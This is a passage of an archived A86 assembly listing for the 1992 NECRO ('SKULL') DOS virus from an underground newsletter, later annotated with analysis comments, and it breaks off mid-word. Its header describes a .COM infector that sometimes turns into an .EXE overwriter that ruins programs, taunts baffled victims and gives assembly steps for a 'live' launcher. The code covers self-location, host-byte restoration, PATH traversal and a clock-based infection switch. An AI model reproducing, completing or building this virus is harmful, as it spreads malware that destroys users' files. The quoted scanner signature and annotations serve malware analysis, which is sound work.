NECRO.A86
Text File
|
1993-01-04
|
22KB
|
396 lines
; A86 SOURCE CODE for:
;
; ++===================================================++
; || NECRO (A.K.A. 'SKULL' virus) ||
; || The 666 byte Dual Replicator ||
; || DEC 1992 by Primal Fury, Lehigh Valley, PA ||
; ++===================================================++
; -=Prepared for Crypt Newsletter 11=-
;
; Here's a virus that's actually two viruses in one. The main virus is a
; direct action, appending .COM infector. It will search the system path
; for .COMs to infect, and may infect files on the path in preference to
; those in the current directory (if no path is set, it stays in the
; current directory). Roughly one out of every eight infections (on a ran-
; dom basis) will be non-standard. In these infections, NECRO will toggle to
; an overwriting .EXE infector.
;
;
; This .EXE infector is composed of much of the same code as the
; COM infector -- the virus alternates between the two modes of infection
; using a 'master switch' which is hooked up to a simple randomization
; engine. The master switch, when thrown, trips a series of auxiliary
; switches which alter the virus' behavior. This saves on bytes and is
; therefore much better than having the virus drop an entirely independent
; .EXE overwriter. I hope to expand upon this 'self-programming' concept
; in future viruses.
; Infected .COM's should function as intended after the viral code appended to
; them has finished doing its thing. But infected .EXE's are ruined. These
; (provided they are under about 64K in length) will, when executed, pass
; their illness on to the next uninfected .EXE within the current directory,
; displaying the following graphic & message:
; ▄▄████████▄▄
; ▄█████▓████████
;▐█▓█████████████▌ You cant execute this file:
;▐█████▓▓███▀ █ Its already dead!
; ██████▓▓██▄▄▄█▀
; ████▓▓▀▓████▌
; ▀▀██▓▓▄▐▓███▌
; ▓▓▌▌▌
; SKULL will then return the baffled user to the DOS prompt. I leave it to
; your imagination to picture the consternation on the novice's face
; as he tries to isolate the source of this overwriting infection which
; seems to pop up again and again in different directories. A very
; observant user may notice a file length increase of exactly 666 bytes in
; infected .COM's. Infected .EXE's will not increase in length unless they
; are less than ~200 bytes to begin with. Note that overwritten .EXE's larger
; than 64K will fail to load and will be non-infectious. Like Popoolar
; Science, the virus renders these programs .COM-like in structure.
; DOS will NOT execute these files. In any case, the programs are ruined
; by SKULL. As of this release, NECRO avoids files that are read-only or
; hidden, so these files are safe from the virus (for now...)
; CREDITS: DARK ANGEL -- for his COM infector replicatory code. (D.A.)
; NOWHERE MAN -- for his VCL 1.0's path-searching routine. (N.M.)
;
;
; Except where noted, I have commented the code with the novice
; programmer in mind. In the places so noted, D.A.'s and N.M.'s com-
; ments, supplied from VCL 1.0 and PS-MPC assembly libraries, have been
; left intact.
; To assemble, use Isaacson's A86 to generate a .COM file directly from
; this listing. You will have a live NECRO launcher. MASM/TASM
; compatible assemblers will require the addition of a declarative pair.
;
; Partial viral signature suitable for loading into TBScan's VIRSCAN.DAT,
; SCAN, or F-PROT 2.0x:
; [Necro]
; A9 01 00 74 29 E8 6A 00 8C C8 8E D8 8E C0 32 C0
; Entry stub and top-level flow (analysis notes).
; The first three bytes are a hand-encoded near JMP (opcode 0E9h) with a
; zero displacement, so in this listing execution falls straight through
; to Find_start.
; NOTE(analysis): the entry sequence below (call/pop/sub to compute a
; relocation delta, then a 3-byte write to offset 100h of the running
; image) is a structural trait of appending .COM infectors and is useful
; when triaging a suspect .COM file statically.
; set_dta, search_files' helpers, quit, stuff and dta are defined outside
; this excerpt; statements about them come from the original comments.
Start: db 0e9h ; jump to find_start
dw 0
; call/pop "delta offset" idiom: CALL pushes the run-time address of `next`,
; POP BP retrieves it, and subtracting the assemble-time offset leaves BP =
; the displacement between where the code was assembled and where it runs.
; Every [bp+offset ...] operand below depends on that value.
Find_start: call next ;common technique to allow virus to
next: pop bp ;find its own code. On exit, bp
sub bp, offset next ;points to start of code.
lea si, [bp+offset stuff] ;SI -> the 3 saved host bytes (`stuff`).
mov di, 100h ;DI = 100h, where all COMs start in
push di ;memory; 100h is left on the stack and,
;per the original comment, is where control
;is returned to the host file.
movsw ;copy 2 + 1 = 3 bytes from `stuff` to 100h:
movsb ;the host's original first bytes are put back.
mov di,bp ;DI = BP (the delta); search_files copies it to BX.
lea dx, [bp+offset dta] ;DX -> private DTA buffer, so the file
call set_dta ;searches do not disturb the host's own DTA.
call search_files ;call path-search/infection routine.
jmp quit ;when done, return control to
;host file (`quit` is not shown here).
;Nowhere Man's VCL 1.0 path search routine, slightly modified for
;compatibility with Dark Angel's code, and with 'master infection-mode
;switch' added. N.M.'s original comments have been retained for your
;enlightenment.
; search_files -- directory walk that drives the infection attempts.
; In:  DI = relocation delta (copied to BX); BP = the same delta.
; Out: carry set when the PATH walk ran out of directories (path_ad == 0);
;      carry clear otherwise (CMP against 0 never produces a borrow).
;      BP is saved and restored.
; Effects visible here: saves the current directory, changes directory
; (INT 21h/AH=3Bh) once per PATH entry and restores the saved directory
; before returning; sets DS and ES to CS inside the loop; reads the
; system clock (INT 21h/AH=2Ch).
; traverse_path, found_subdir, find_files, pathstore and path_ad are defined
; outside this excerpt; statements about them come from the original
; comments and are not verified here.
search_files:
mov bx,di ; BX points to the virus
push bp ; Save BP
mov byte ptr [bp+offset pathstore],'\' ;Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp+offset pathstore+1] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop:
; NOTE(analysis): the scanner signature quoted in the file header
; (A9 01 00 74 29 E8 6A 00 8C C8 8E D8 8E C0 32 C0) appears to correspond to
; the instructions from here through `xor al,al`: the tail of the CMP
; operand bytes, JE rel8, CALL rel16, MOV AX,CS / MOV DS,AX / MOV ES,AX,
; XOR AL,AL -- confirm against an assembled image.
cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory (DI is presumably left
; just past the copied name by found_subdir)
mov ah,03Bh ; DOS change directory function
lea dx,[bp+offset pathstore+65] ; DX points to the directory
int 021h
;The Master Switch, tied whimsically to the system clock:
mov ah,2ch ;DOS get system time (DL = hundredths of a second).
int 21h ;
cmp dl,13 ;is 1/100th second > 13? (true for 86 of 100 values)
jg call_infector ;if so, stay in COM infector
;mode (the default).
mov si,3 ;throw switch for EXE infect; how SI is consumed
;is not visible in this excerpt.
;back to Nowhere Man's code:
call_infector:
push di
call find_files ; Try to infect a file.
pop di
jnc done_searching ; If successful (carry clear), exit
jmp short traversal_loop ; Keep checking the PATH
done_searching:
mov ah,03Bh ; DOS change directory function
lea dx,[bp+offset pathstore] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not, exit (carry is clear after this CMP)
stc ; Set carry flag for failure
at_least_tried:
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
traverse_path:
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset
find_pa